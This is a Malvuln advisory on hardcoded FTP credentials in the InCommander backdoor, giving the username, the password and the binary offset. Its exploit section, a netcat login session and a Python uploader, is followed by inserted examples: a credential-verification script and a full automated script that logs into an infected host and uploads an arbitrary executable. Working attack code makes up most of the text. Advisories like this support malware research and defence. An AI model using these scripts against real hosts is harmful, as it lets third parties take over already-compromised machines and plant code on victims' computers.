Credits: Malvuln (John Page, aka Hyp3rlinx), Discovery (c) 2022
Original source: https://malvuln.com/advisory/dd76d8a5874bf8bf05279e35c68449ca.txt
Contact: [email protected]
Media: twitter.com/malvuln
Backup media: infosec.exchange/@malvuln
Threat: Backdoor.Win32.InCommander.17.b
Vulnerability: Hardcoded Cleartext Credentials
Family: InCommander
Type: PE32
MD5: dd76d8a5874bf8bf05279e35c68449ca
Vuln ID: MVID-2022-0665
Files dropped: incsrv.exe
Disclosure: 12/14/2022
Description: The malware listens on TCP ports 9400 and 9401 and requires authentication. The username "IncUserb3" is stored in cleartext in the file "incsrv.drv" under the Windows directory. The password "InClientMainPassword" is likewise stored in cleartext, inside the dropped PE file "incsrv.exe" at file offset 000958d0.
Third-party adversaries who recover these credentials can authenticate to the backdoor's FTP service and upload their own executables to the infected host using the FTP PASV and STOR commands.
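The following is an added example, not part of the Malvuln advisory, showing how an analyst would confirm the two cleartext credentials described above in a local copy of the sample: read the NUL-terminated string at the quoted offset of incsrv.exe, fall back to a byte search if the build differs, and check incsrv.drv for the username. The 0x958D0 offset and both strings come from the advisory; the padded buffer built by build_constructed_sample() is a constructed stand-in for the real binary so the code runs offline.

```python
"""Added example (not Malvuln's code): verify the hardcoded credentials
described in the advisory against a local copy of incsrv.exe / incsrv.drv."""

PASSWORD_OFFSET = 0x958D0                      # offset quoted in the advisory
EXPECTED_PASSWORD = b"InClientMainPassword"     # password quoted in the advisory
EXPECTED_USER = b"IncUserb3"                    # username quoted in the advisory


def read_cstring(buf: bytes, offset: int, max_len: int = 64) -> bytes:
    """Return the NUL-terminated ASCII string that starts at `offset`.

    Stops at the first NUL byte or after `max_len` bytes, whichever comes
    first, so a malformed or truncated file cannot make us read past the end.
    """
    if offset < 0 or offset >= len(buf):
        raise ValueError(f"offset 0x{offset:x} outside buffer of {len(buf)} bytes")
    end = buf.find(b"\x00", offset, offset + max_len)
    if end == -1:
        end = min(len(buf), offset + max_len)
    return buf[offset:end]


def check_password_at_offset(pe_bytes: bytes,
                             offset: int = PASSWORD_OFFSET,
                             expected: bytes = EXPECTED_PASSWORD) -> bool:
    """True if the advisory's password sits exactly at the advisory's offset."""
    try:
        return read_cstring(pe_bytes, offset) == expected
    except ValueError:
        return False


def find_credential(buf: bytes, needle: bytes) -> int:
    """Offset of the first occurrence of `needle`, or -1 if absent.

    Useful when a different build of the dropper moves the string.
    """
    return buf.find(needle)


def check_drv_username(drv_bytes: bytes, expected: bytes = EXPECTED_USER) -> bool:
    """True if incsrv.drv contains the cleartext username."""
    return expected in drv_bytes


def build_constructed_sample() -> bytes:
    """Constructed stand-in for incsrv.exe (NOT the real sample): zero padding
    with the password placed at the advisory's offset, NUL-terminated."""
    buf = bytearray(PASSWORD_OFFSET + 0x40)
    buf[PASSWORD_OFFSET:PASSWORD_OFFSET + len(EXPECTED_PASSWORD)] = EXPECTED_PASSWORD
    return bytes(buf)


if __name__ == "__main__":
    # Point these at a real sample inside an isolated lab to check the advisory.
    sample = build_constructed_sample()
    print("password at 0x%x: %s" % (PASSWORD_OFFSET, check_password_at_offset(sample)))
    print("password found at: 0x%x" % find_credential(sample, EXPECTED_PASSWORD))
    print("username in drv:", check_drv_username(b"\x00\x00IncUserb3\x00"))
```

Against a real sample, read incsrv.exe and incsrv.drv with open(path, "rb").read() and pass the bytes in; a mismatch at the fixed offset with a successful find_credential() simply means the string moved in that build.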
Exploit/PoC:
C:\>nc64.exe 192.168.18.125 9401
220 InCommad FTP Server ready
USER IncUserb3
331 Password required for IncUserb3.
PASS InClientMainPassword
230 User IncUserb3 logged in.
SYST
215 UNIX Type: L8 Internet Component Suite
PASV
227 Entering Passive Mode (192,168,18,125,241,155).
CDUP
250 CWD command successful. Current directory is "C:/".
STOR DOOM_SM.exe
150 Opening data connection for DOOM_SM.exe
226 File received OK
from socket import *

MALWARE_HOST = "192.168.18.125"
PORT = 61851  # data port from the 227 reply above: 241*256 + 155
DOOM = "DOOM_SM.exe"

def doit():
    # Connect to the passive-mode data port the backdoor opened for the STOR
    # command and stream the executable over it.
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))
    with open(DOOM, "rb") as f:
        chunk = f.read(4096)
        while chunk:
            s.sendall(chunk)
            chunk = f.read(4096)
    s.close()
    print("By Malvuln")

if __name__ == "__main__":
    doit()
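The manual netcat session and the data-channel uploader above can be combined into one script. The block below is an added example, not Malvuln's code: it drives the control channel (USER, PASS, PASV, STOR) with raw sockets, parses the 227 reply into the passive host and port the same way the PORT constant above was derived by hand, and then pushes the file over the data connection. The host, port, credentials and file name are the ones quoted in the advisory; the helper names (FtpControl, parse_pasv, upload_via_pasv) are this example's own. Only run it against an infected host in an isolated lab.

```python
"""Added example (not Malvuln's code): automate the PASV/STOR upload shown in
the advisory's netcat session. Control and data channels both use raw sockets."""
import re
import socket

MALWARE_HOST = "192.168.18.125"   # values from the advisory
CONTROL_PORT = 9401
USER = "IncUserb3"
PASSWORD = "InClientMainPassword"

# "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)."
PASV_RE = re.compile(r"227 .*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")


def parse_pasv(reply: str) -> tuple[str, int]:
    """Turn a 227 reply into (host, port); port = p1*256 + p2 per RFC 959."""
    m = PASV_RE.search(reply)
    if not m:
        raise ValueError(f"not a PASV reply: {reply!r}")
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    if p1 > 255 or p2 > 255 or max(h1, h2, h3, h4) > 255:
        raise ValueError(f"out-of-range PASV fields: {reply!r}")
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def expect(reply: str, code: int) -> bool:
    """True if the reply carries the given 3-digit status code."""
    return reply.startswith(f"{code} ") or reply.startswith(f"{code}-")


class FtpControl:
    """Minimal line-oriented wrapper around the control socket.

    Single-line replies only (enough for this server); multi-line "nnn-"
    replies would need continuation handling.
    """

    def __init__(self, sock: socket.socket):
        self.sock = sock
        self.buf = b""

    def readline(self) -> str:
        while b"\r\n" not in self.buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                raise ConnectionError("control connection closed")
            self.buf += chunk
        line, _, self.buf = self.buf.partition(b"\r\n")
        return line.decode("latin-1")

    def cmd(self, line: str) -> str:
        self.sock.sendall((line + "\r\n").encode("latin-1"))
        return self.readline()


def upload_via_pasv(host: str, port: int, user: str, password: str,
                    remote_name: str, data: bytes, timeout: float = 10.0) -> str:
    """Log in with the hardcoded credentials and STOR `data` as `remote_name`.

    Returns the final transfer-complete reply (expected "226 ...").
    """
    with socket.create_connection((host, port), timeout=timeout) as ctl_sock:
        ctl = FtpControl(ctl_sock)
        if not expect(ctl.readline(), 220):
            raise RuntimeError("unexpected banner")
        if not expect(ctl.cmd(f"USER {user}"), 331):
            raise RuntimeError("USER rejected")
        if not expect(ctl.cmd(f"PASS {password}"), 230):
            raise RuntimeError("login rejected: credentials differ from the advisory")
        data_host, data_port = parse_pasv(ctl.cmd("PASV"))
        # Open the data channel before STOR (RFC 959 order), then stream the file.
        with socket.create_connection((data_host, data_port), timeout=timeout) as data_sock:
            if not expect(ctl.cmd(f"STOR {remote_name}"), 150):
                raise RuntimeError("STOR rejected")
            data_sock.sendall(data)
        return ctl.readline()


if __name__ == "__main__":
    with open("DOOM_SM.exe", "rb") as f:
        print(upload_via_pasv(MALWARE_HOST, CONTROL_PORT, USER, PASSWORD,
                              "DOOM_SM.exe", f.read()))
```

The PASV parse is the part worth keeping even if you prefer netcat for the rest: the 227 reply in the session above decodes to 192.168.18.125:61851, which is exactly the port hard-coded in the uploader.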
Disclaimer: This advisory information is provided "as-is," without warranties, guarantees or other conditions. This advisory may be redistributed, subject to its original form and credit. For inclusion in vulnerability databases or similar programs, permission is granted explicitly provided credit to the author. Author is not responsible or liable for misuse or misappropriation of information. Any malicious or illegal use of security-related information, exploits or other methods is prohibited by the author. You should not try to obtain Malware samples. This website does not accept responsibility for damages resulting from Malware handling errors or downloading any Malware. Copyright for all content (c) Malvuln.com (TM)